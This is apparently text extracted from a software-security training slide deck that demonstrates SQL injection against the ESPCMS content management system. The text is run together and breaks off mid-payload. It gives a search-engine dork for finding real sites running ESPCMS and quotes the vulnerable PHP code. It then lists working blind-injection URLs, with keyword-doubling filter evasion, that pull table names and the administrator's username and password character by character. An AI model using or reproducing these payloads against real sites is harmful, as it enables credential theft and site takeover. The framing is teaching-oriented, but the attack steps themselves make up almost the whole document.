SoftwareDevelopmentSecurityXuHui,CISSPEmail:china.xuhui@gmail.com1PARTISoftwareAttackDemonstration2StatisticsofCyberCrime3Demo:ESPCMSasaVictim问题代码:if(!empty($tagkey)){$db_where.="ANDFIND_IN_SET('$tagkey',tags)";}•Step1:寻找站点,百度搜索是用了ESPCMS的站inurl:index.php?ac=article&at=read&did=•Step2:判断可注入性:index.php?ac=search&at=taglist&tagkey=a%25274Demo:ESPCMSasaVictim•Step3:获取管理员表:http://172.16.0.6/upload/index.php?ac=search&at=taglist&tagkey=anything%2527,tags)ordid>1and48=ascii((seselectlectmid(table_name,1,1)frfromominformation_schema.tableswhwhereeretable_schema=database()limit1,1))limit1--anythinghttp://172.16.0.6/upload/index.php?ac=search&at=taglist&tagkey=anything%2527,tags)ordid>1and101=ascii((seselectlectmid(table_name,1,1)frfromominformation_schema.tableswhwhereeretable_schema=database()limit1,1))limit1--anythinghttp://172.16.0.6/upload/index.php?ac=search&at=taglist&tagkey=anything%2527,tags)ordid>1and101=ascii((seselectlectmid(table_name,2,1)frfromominformation_schema.tableswhwhereeretable_schema=database()limit1,1))limit1--anything5Demo:ESPCMSasaVictim•Step4:获取管理员用户名长度:http://172.16.0.6/upload/index.php?ac=search&at=taglist&tagkey=a%2527,tags)ordid>1and1=(seselectlectlength(username)frfromomespcms_admin_memberlimit1)limit1--anythinghttp://172.16.0.6/upload/index.php?ac=search&at=taglist&tagkey=a%2527,tags)ordid>1and5=(seselectlectlength(username)frfromomespcms_admin_memberlimit1)limit1--anything6Demo:ESPCMSasaVictim•Step5:获取用户名和密码:http://172.16.0.6/upload/index.php?ac=search&at=taglist&tagkey=a%2527,tags)ordid>1and48=ascii((seselectlectmid(username,1,1)frfromomespcms_admin_memberlimit1))limit1–anythinghttp://172.16.0.6/upload/index.php?ac=search&at=taglist&tagkey=a%2527,tags)ordid>1and97=ascii((seselectlectmid(username,1,1)frfromomespcms_admin_memberlimit1))limit1--anythinghttp://172.16.0.6/upload/index.php?ac=search&at=taglist&tagkey=a%2527,tags)ordid>1and48=ascii((seselectlectmid(username,2,1)frfromome...
